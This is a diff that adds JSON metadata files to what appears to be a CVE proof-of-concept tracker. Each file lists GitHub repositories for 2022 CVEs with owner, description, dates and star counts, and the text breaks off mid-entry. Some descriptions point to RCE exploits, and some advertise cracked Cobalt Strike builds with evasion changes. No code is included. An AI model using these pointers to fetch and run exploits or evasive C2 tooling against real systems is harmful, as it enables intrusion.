100644 index 0000000000..2c59d6490d --- /dev/null +++ b/2022/CVE-2022-38725.json @@ -0,0 +1,33 @@ +[ + { + "id": 841578878, + "name": "CVE-2022-38725", + "full_name": "wdahlenburg\/CVE-2022-38725", + "owner": { + "login": "wdahlenburg", + "id": 4451504, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4451504?v=4", + "html_url": "https:\/\/github.com\/wdahlenburg", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/wdahlenburg\/CVE-2022-38725", + "description": "Proof of Concept for CVE-2022-38725 against syslog-ng", + "fork": false, + "created_at": "2024-08-12T17:27:57Z", + "updated_at": "2024-08-12T18:32:01Z", + "pushed_at": "2024-08-12T18:31:27Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-38766.json b/2022/CVE-2022-38766.json new file mode 100644 index 0000000000..a4ade93dad --- /dev/null +++ b/2022/CVE-2022-38766.json @@ -0,0 +1,33 @@ +[ + { + "id": 529328915, + "name": "CVE-2022-38766", + "full_name": "MalHyuk\/CVE-2022-38766", + "owner": { + "login": "MalHyuk", + "id": 59429883, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/59429883?v=4", + "html_url": "https:\/\/github.com\/MalHyuk", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/MalHyuk\/CVE-2022-38766", + "description": "PoC for vulnerability in Renault ZOE Keyless System(CVE-2022-38766)", + "fork": false, + "created_at": "2022-08-26T16:23:44Z", + "updated_at": "2022-08-26T16:22:08Z", + "pushed_at": "2022-10-07T13:05:06Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-38789.json b/2022/CVE-2022-38789.json new file mode 100644 index 0000000000..eb8ce578b2 --- /dev/null +++ b/2022/CVE-2022-38789.json @@ -0,0 +1,33 @@ +[ + { + "id": 536572509, + "name": "Airties-CVE-2022-38789", + "full_name": "ProxyStaffy\/Airties-CVE-2022-38789", + "owner": { + "login": "ProxyStaffy", + "id": 113522001, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/113522001?v=4", + "html_url": "https:\/\/github.com\/ProxyStaffy", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ProxyStaffy\/Airties-CVE-2022-38789", + "description": null, + "fork": false, + "created_at": "2022-09-14T12:43:05Z", + "updated_at": "2022-09-15T01:06:20Z", + "pushed_at": "2022-09-16T17:08:14Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-38813.json b/2022/CVE-2022-38813.json new file mode 100644 index 0000000000..e6d45ebbff --- /dev/null +++ b/2022/CVE-2022-38813.json @@ -0,0 +1,33 @@ +[ + { + "id": 556286329, + "name": "CVE-2022-38813", + "full_name": "RashidKhanPathan\/CVE-2022-38813", + "owner": { + "login": "RashidKhanPathan", + "id": 65374016, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/65374016?v=4", + "html_url": "https:\/\/github.com\/RashidKhanPathan", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RashidKhanPathan\/CVE-2022-38813", + "description": "Authenticated Vertical Privilege Escalation Vulnerability in Blood Donor Management System", + "fork": false, + "created_at": "2022-10-23T14:03:41Z", + "updated_at": "2022-10-24T00:50:52Z", + "pushed_at": "2022-10-23T15:46:53Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-3904.json b/2022/CVE-2022-3904.json new file mode 100644 index 0000000000..11c00b7b5d --- /dev/null +++ b/2022/CVE-2022-3904.json @@ -0,0 +1,33 @@ +[ + { + "id": 665481628, + "name": "CVE-2022-3904", + "full_name": "RandomRobbieBF\/CVE-2022-3904", + "owner": { + "login": "RandomRobbieBF", + "id": 51722811, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4", + "html_url": "https:\/\/github.com\/RandomRobbieBF", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2022-3904", + "description": "CVE-2022-3904 MonsterInsights < 8.9.1 - Stored Cross-Site Scripting via Google Analytics", + "fork": false, + "created_at": "2023-07-12T09:51:32Z", + "updated_at": "2024-08-12T20:32:06Z", + "pushed_at": "2023-07-12T10:18:02Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 3, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-39066.json b/2022/CVE-2022-39066.json new file mode 100644 index 0000000000..37601b3ff6 --- /dev/null +++ b/2022/CVE-2022-39066.json @@ -0,0 +1,45 @@ +[ + { + "id": 577325573, + "name": "CVE-2022-39066", + "full_name": "v0lp3\/CVE-2022-39066", + "owner": { + "login": "v0lp3", + "id": 20267645, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20267645?v=4", + "html_url": "https:\/\/github.com\/v0lp3", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/v0lp3\/CVE-2022-39066", + "description": "Proof of concept of the SQL injection vulnerability affecting the ZTE MF286R router.", + "fork": false, + "created_at": "2022-12-12T13:45:21Z", + "updated_at": "2024-08-12T20:28:51Z", + "pushed_at": "2022-12-12T19:18:59Z", + "stargazers_count": 11, + "watchers_count": 11, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "exploit", + "iot", + "mf286r", + "poc", + "proof-of-concept", + "router", + "sql-injection", + "sqli", + "sqlite3", + "zte" + ], + "visibility": "public", + "forks": 2, + "watchers": 11, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-39073.json b/2022/CVE-2022-39073.json new file mode 100644 index 0000000000..c9a73d5ba6 --- /dev/null +++ b/2022/CVE-2022-39073.json @@ -0,0 +1,42 @@ +[ + { + "id": 586354436, + "name": "CVE-2022-39073", + "full_name": "v0lp3\/CVE-2022-39073", + "owner": { + "login": "v0lp3", + "id": 20267645, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20267645?v=4", + "html_url": "https:\/\/github.com\/v0lp3", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/v0lp3\/CVE-2022-39073", + "description": "Proof of concept for the command injection vulnerability affecting the ZTE MF286R router, including an RCE exploit.", + "fork": false, + "created_at": "2023-01-07T20:46:20Z", + "updated_at": "2024-09-06T19:37:20Z", + "pushed_at": "2023-01-07T20:54:07Z", + "stargazers_count": 10, + "watchers_count": 10, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "command-injection", + "cve-2022-39073", + "exploit", + "iot", + "mf286r", + "rce", + "router", + "zte" + ], + "visibility": "public", + "forks": 4, + "watchers": 10, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-3910.json b/2022/CVE-2022-3910.json new file mode 100644 index 0000000000..0705b70a98 --- /dev/null +++ b/2022/CVE-2022-3910.json @@ -0,0 +1,64 @@ +[ + { + "id": 613743412, + "name": "CVE-2022-3910", + "full_name": "veritas501\/CVE-2022-3910", + "owner": { + "login": "veritas501", + "id": 25763545, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25763545?v=4", + "html_url": "https:\/\/github.com\/veritas501", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/veritas501\/CVE-2022-3910", + "description": "CVE-2022-3910", + "fork": false, + "created_at": "2023-03-14T07:22:25Z", + "updated_at": "2024-10-27T03:12:46Z", + "pushed_at": "2023-03-14T11:58:41Z", + "stargazers_count": 12, + "watchers_count": 12, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 12, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 833901421, + "name": "CVE-2022-3910", + "full_name": "TLD1027\/CVE-2022-3910", + "owner": { + "login": "TLD1027", + "id": 103564619, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/103564619?v=4", + "html_url": "https:\/\/github.com\/TLD1027", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/TLD1027\/CVE-2022-3910", + "description": "使用两种不同的角度实现对于CVE-2022-3910的利用", + "fork": false, + "created_at": "2024-07-26T02:21:08Z", + "updated_at": "2024-07-26T02:35:58Z", + "pushed_at": "2024-07-26T02:35:55Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-39196.json b/2022/CVE-2022-39196.json new file mode 100644 index 0000000000..a7f1a0338a --- /dev/null +++ b/2022/CVE-2022-39196.json @@ -0,0 +1,33 @@ +[ + { + "id": 531864741, + "name": "CVE-2022-39196-", + "full_name": "DayiliWaseem\/CVE-2022-39196-", + "owner": { + "login": "DayiliWaseem", + "id": 105648077, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/105648077?v=4", + "html_url": "https:\/\/github.com\/DayiliWaseem", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/DayiliWaseem\/CVE-2022-39196-", + "description": "Black board CMS Escalation of Privileges", + "fork": false, + "created_at": "2022-09-02T09:35:35Z", + "updated_at": "2022-09-02T09:35:35Z", + "pushed_at": "2022-09-02T09:58:24Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-39197.json b/2022/CVE-2022-39197.json new file mode 100644 index 0000000000..640f0d5647 --- /dev/null +++ b/2022/CVE-2022-39197.json @@ -0,0 +1,479 @@ +[ + { + "id": 539337304, + "name": "CVE-2022-39197", + "full_name": "safe3s\/CVE-2022-39197", + "owner": { + "login": "safe3s", + "id": 108328094, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/108328094?v=4", + "html_url": "https:\/\/github.com\/safe3s", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/safe3s\/CVE-2022-39197", + "description": "CVE-2022-39197", + "fork": false, + "created_at": "2022-09-21T06:22:10Z", + "updated_at": "2023-04-24T13:24:18Z", + "pushed_at": "2022-09-21T06:42:17Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": true, + "forks_count": 0, + "allow_forking": true, + "is_template": true, + "web_commit_signoff_required": true, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 539771310, + "name": "cobaltstrike4.5_cdf-1", + "full_name": "zeoday\/cobaltstrike4.5_cdf-1", + "owner": { + "login": "zeoday", + "id": 112299608, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/112299608?v=4", + "html_url": "https:\/\/github.com\/zeoday", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/zeoday\/cobaltstrike4.5_cdf-1", + "description": "cobaltstrike4.5版本破\/解、去除checksum8特征、bypass BeaconEye、修复错误路径泄漏stage、增加totp双因子验证、修复CVE-2022-39197等", + "fork": false, + "created_at": "2022-09-22T02:50:45Z", + "updated_at": "2022-09-22T19:46:17Z", + "pushed_at": "2022-09-22T02:00:14Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 540026592, + "name": "cve-2022-39197", + "full_name": "burpheart\/cve-2022-39197", + "owner": { + "login": "burpheart", + "id": 35721255, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/35721255?v=4", + "html_url": "https:\/\/github.com\/burpheart", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/burpheart\/cve-2022-39197", + "description": "cve-2022-39197 poc", + "fork": false, + "created_at": "2022-09-22T14:39:02Z", + "updated_at": "2024-10-04T11:42:53Z", + "pushed_at": "2022-09-22T15:03:24Z", + "stargazers_count": 73, + "watchers_count": 73, + "has_discussions": false, + "forks_count": 17, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 17, + "watchers": 73, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 540344470, + "name": "CVE-2022-39197-POC", + "full_name": "xzajyjs\/CVE-2022-39197-POC", + "owner": { + "login": "xzajyjs", + "id": 25580455, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25580455?v=4", + "html_url": "https:\/\/github.com\/xzajyjs", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/xzajyjs\/CVE-2022-39197-POC", + "description": "CVE-2022-39197(CobaltStrike XSS <=4.7) POC", + "fork": false, + "created_at": "2022-09-23T08:20:07Z", + "updated_at": "2024-09-07T04:14:55Z", + "pushed_at": "2022-09-30T06:31:11Z", + "stargazers_count": 48, + "watchers_count": 48, + "has_discussions": false, + "forks_count": 13, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 13, + "watchers": 48, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 540757312, + "name": "CSPOC", + "full_name": "yqcs\/CSPOC", + "owner": { + "login": "yqcs", + "id": 32994290, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/32994290?v=4", + "html_url": "https:\/\/github.com\/yqcs", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/yqcs\/CSPOC", + "description": "Cobalt Strike RCE CVE-2022-39197 ", + "fork": false, + "created_at": "2022-09-24T08:14:36Z", + "updated_at": "2023-10-13T06:40:41Z", + "pushed_at": "2022-09-25T08:59:09Z", + "stargazers_count": 17, + "watchers_count": 17, + "has_discussions": false, + "forks_count": 8, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cobalt-strike", + "cve-2022-39197", + "rce" + ], + "visibility": "public", + "forks": 8, + "watchers": 17, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 540859131, + "name": "Cobaltstrike-RCE-CVE-2022-39197", + "full_name": "purple-WL\/Cobaltstrike-RCE-CVE-2022-39197", + "owner": { + "login": "purple-WL", + "id": 63894044, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/63894044?v=4", + "html_url": "https:\/\/github.com\/purple-WL", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/purple-WL\/Cobaltstrike-RCE-CVE-2022-39197", + "description": null, + "fork": false, + "created_at": "2022-09-24T14:36:47Z", + "updated_at": "2022-09-25T21:25:42Z", + "pushed_at": "2022-09-24T14:42:24Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 541427621, + "name": "about_cobaltstrike4.5_cdf", + "full_name": "lovechoudoufu\/about_cobaltstrike4.5_cdf", + "owner": { + "login": "lovechoudoufu", + "id": 95681496, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/95681496?v=4", + "html_url": "https:\/\/github.com\/lovechoudoufu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/lovechoudoufu\/about_cobaltstrike4.5_cdf", + "description": "cobaltstrike4.5版本破解、去除checksum8特征、bypass BeaconEye、修复错误路径泄漏stage、增加totp双因子验证、修复CVE-2022-39197等", + "fork": false, + "created_at": "2022-09-26T05:49:58Z", + "updated_at": "2024-07-11T07:23:02Z", + "pushed_at": "2022-09-26T06:17:25Z", + "stargazers_count": 18, + "watchers_count": 18, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 18, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 541494150, + "name": "CVE-2022-39197-patch", + "full_name": "burpheart\/CVE-2022-39197-patch", + "owner": { + "login": "burpheart", + "id": 35721255, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/35721255?v=4", + "html_url": "https:\/\/github.com\/burpheart", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/burpheart\/CVE-2022-39197-patch", + "description": "CVE-2022-39197 漏洞补丁. CVE-2022-39197 Vulnerability Patch. ", + "fork": false, + "created_at": "2022-09-26T08:58:21Z", + "updated_at": "2024-11-24T15:25:04Z", + "pushed_at": "2022-09-26T13:20:38Z", + "stargazers_count": 315, + "watchers_count": 315, + "has_discussions": false, + "forks_count": 46, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cobalt-strike", + "cobaltstrike", + "cve-2022-39197" + ], + "visibility": "public", + "forks": 46, + "watchers": 315, + "score": 0, + "subscribers_count": 5 + }, + { + "id": 542025379, + "name": "cobaltstrike_swing_xss2rce", + "full_name": "hluwa\/cobaltstrike_swing_xss2rce", + "owner": { + "login": "hluwa", + "id": 18900732, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18900732?v=4", + "html_url": "https:\/\/github.com\/hluwa", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hluwa\/cobaltstrike_swing_xss2rce", + "description": "CVE-2022-39197", + "fork": false, + "created_at": "2022-09-27T10:21:54Z", + "updated_at": "2023-04-11T03:40:01Z", + "pushed_at": "2022-09-27T10:56:03Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 7, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 548184563, + "name": "CVE-2022-39197-fix_patch", + "full_name": "4nth0ny1130\/CVE-2022-39197-fix_patch", + "owner": { + "login": "4nth0ny1130", + "id": 73661290, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/73661290?v=4", + "html_url": "https:\/\/github.com\/4nth0ny1130", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/4nth0ny1130\/CVE-2022-39197-fix_patch", + "description": "CVE-2022-39197 bug fix patch", + "fork": false, + "created_at": "2022-10-09T04:06:23Z", + "updated_at": "2023-08-13T03:16:26Z", + "pushed_at": "2022-10-09T05:50:49Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 7, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 551432473, + "name": "CVE-2022-39197", + "full_name": "its-arun\/CVE-2022-39197", + "owner": { + "login": "its-arun", + "id": 20841421, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20841421?v=4", + "html_url": "https:\/\/github.com\/its-arun", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/its-arun\/CVE-2022-39197", + "description": "CobaltStrike <= 4.7.1 RCE", + "fork": false, + "created_at": "2022-10-14T11:46:01Z", + "updated_at": "2024-11-25T09:21:07Z", + "pushed_at": "2022-10-25T05:32:54Z", + "stargazers_count": 376, + "watchers_count": 376, + "has_discussions": false, + "forks_count": 77, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 77, + "watchers": 376, + "score": 0, + "subscribers_count": 7 + }, + { + "id": 555782036, + "name": "CVE-2022-39197-RCE", + "full_name": "TheCryingGame\/CVE-2022-39197-RCE", + "owner": { + "login": "TheCryingGame", + "id": 48227194, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/48227194?v=4", + "html_url": "https:\/\/github.com\/TheCryingGame", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/TheCryingGame\/CVE-2022-39197-RCE", + "description": "CVE-2022-39197 RCE POC", + "fork": false, + "created_at": "2022-10-22T10:11:37Z", + "updated_at": "2024-05-20T14:01:29Z", + "pushed_at": "2022-10-22T11:13:59Z", + "stargazers_count": 13, + "watchers_count": 13, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 13, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 570245587, + "name": "CVE-2022-39197", + "full_name": "adeljck\/CVE-2022-39197", + "owner": { + "login": "adeljck", + "id": 24542600, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/24542600?v=4", + "html_url": "https:\/\/github.com\/adeljck", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/adeljck\/CVE-2022-39197", + "description": "CVE-2022-39197", + "fork": false, + "created_at": "2022-11-24T17:22:10Z", + "updated_at": "2023-01-07T10:30:24Z", + "pushed_at": "2022-11-24T17:26:27Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 633726927, + "name": "pig_CS4.4", + "full_name": "xiao-zhu-zhu\/pig_CS4.4", + "owner": { + "login": "xiao-zhu-zhu", + "id": 85468097, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/85468097?v=4", + "html_url": "https:\/\/github.com\/xiao-zhu-zhu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/xiao-zhu-zhu\/pig_CS4.4", + "description": "Cobalt Strike 4.4 猪猪版 去暗桩 去流量特征 beacon仿造真实API服务 修补CVE-2022-39197补丁", + "fork": false, + "created_at": "2023-04-28T06:31:38Z", + "updated_at": "2024-09-17T03:14:47Z", + "pushed_at": "2023-04-28T07:10:00Z", + "stargazers_count": 35, + "watchers_count": 35, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 35, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 726816567, + "name": "Gui-poc-test", + "full_name": "Romanc9\/Gui-poc-test", + "owner": { + "login": "Romanc9", + "id": 55196564, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/55196564?v=4", + "html_url": "https:\/\/github.com\/Romanc9", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Romanc9\/Gui-poc-test", + "description": "A testing tool for CobaltStrike-RCE:CVE-2022-39197; Weblogic-RCE:CVE-2023-21839; MinIO:CVE-2023-28432", + "fork": false, + "created_at": "2023-12-03T13:45:34Z", + "updated_at": "2024-09-01T03:50:31Z", + "pushed_at": "2023-12-05T17:58:36Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2022-39197", + "cve-2023-21839", + "cve-2023-28432" + ], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-39227.json b/2022/CVE-2022-39227.json new file mode 100644 index 0000000000..0df2021005 --- /dev/null +++ b/2022/CVE-2022-39227.json @@ -0,0 +1,64 @@ +[ + { + "id": 650577290, + "name": "CVE-2022-39227", + "full_name": "user0x1337\/CVE-2022-39227", + "owner": { + "login": "user0x1337", + "id": 108862394, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/108862394?v=4", + "html_url": "https:\/\/github.com\/user0x1337", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/user0x1337\/CVE-2022-39227", + "description": "CVE-2022-39227 : Proof of Concept ", + "fork": false, + "created_at": "2023-06-07T11:11:12Z", + "updated_at": "2024-07-12T19:04:28Z", + "pushed_at": "2024-03-19T14:37:31Z", + "stargazers_count": 19, + "watchers_count": 19, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 19, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 778808151, + "name": "CVE-2022-39227", + "full_name": "NoSpaceAvailable\/CVE-2022-39227", + "owner": { + "login": "NoSpaceAvailable", + "id": 143888307, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/143888307?v=4", + "html_url": "https:\/\/github.com\/NoSpaceAvailable", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/NoSpaceAvailable\/CVE-2022-39227", + "description": "A working POC found while doing a HTB challenge. Original: https:\/\/github.com\/user0x1337\/CVE-2022-39227", + "fork": false, + "created_at": "2024-03-28T12:55:13Z", + "updated_at": "2024-03-28T12:58:10Z", + "pushed_at": "2024-03-28T12:59:17Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-39253.json b/2022/CVE-2022-39253.json new file mode 100644 index 0000000000..0f282357ad --- /dev/null +++ b/2022/CVE-2022-39253.json @@ -0,0 +1,64 @@ +[ + { + "id": 580301790, + "name": "docker-cve-2022-39253-poc", + "full_name": "ssst0n3\/docker-cve-2022-39253-poc", + "owner": { + "login": "ssst0n3", + "id": 16935049, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16935049?v=4", + "html_url": "https:\/\/github.com\/ssst0n3", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ssst0n3\/docker-cve-2022-39253-poc", + "description": null, + "fork": false, + "created_at": "2022-12-20T08:17:05Z", + "updated_at": "2024-01-17T16:04:23Z", + "pushed_at": "2023-02-02T06:08:05Z", + "stargazers_count": 10, + "watchers_count": 10, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 10, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 640961335, + "name": "NetworkSecurityFinalProject", + "full_name": "HiImDarwin\/NetworkSecurityFinalProject", + "owner": { + "login": "HiImDarwin", + "id": 53218645, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/53218645?v=4", + "html_url": "https:\/\/github.com\/HiImDarwin", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/HiImDarwin\/NetworkSecurityFinalProject", + "description": "https:\/\/nvd.nist.gov\/vuln\/detail\/CVE-2022-39253", + "fork": false, + "created_at": "2023-05-15T13:40:17Z", + "updated_at": "2023-05-15T13:40:17Z", + "pushed_at": "2023-05-15T15:36:20Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-39275.json b/2022/CVE-2022-39275.json new file mode 100644 index 0000000000..fcab04a87a --- /dev/null +++ b/2022/CVE-2022-39275.json @@ -0,0 +1,33 @@ +[ + { + "id": 889242972, + "name": "CVE-2022-39275", + "full_name": "omar2535\/CVE-2022-39275", + "owner": { + "login": "omar2535", + "id": 9442294, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/9442294?v=4", + "html_url": "https:\/\/github.com\/omar2535", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/omar2535\/CVE-2022-39275", + "description": "CVE-2022-39275 Setup and POC", + "fork": false, + "created_at": "2024-11-15T22:21:16Z", + "updated_at": "2024-11-15T22:24:28Z", + "pushed_at": "2024-11-22T21:38:50Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-39299.json b/2022/CVE-2022-39299.json new file mode 100644 index 0000000000..eda73c6f36 --- /dev/null +++ b/2022/CVE-2022-39299.json @@ -0,0 +1,33 @@ +[ + { + "id": 559966352, + "name": "CVE-2022-39299_PoC_Generator", + "full_name": "doyensec\/CVE-2022-39299_PoC_Generator", + "owner": { + "login": 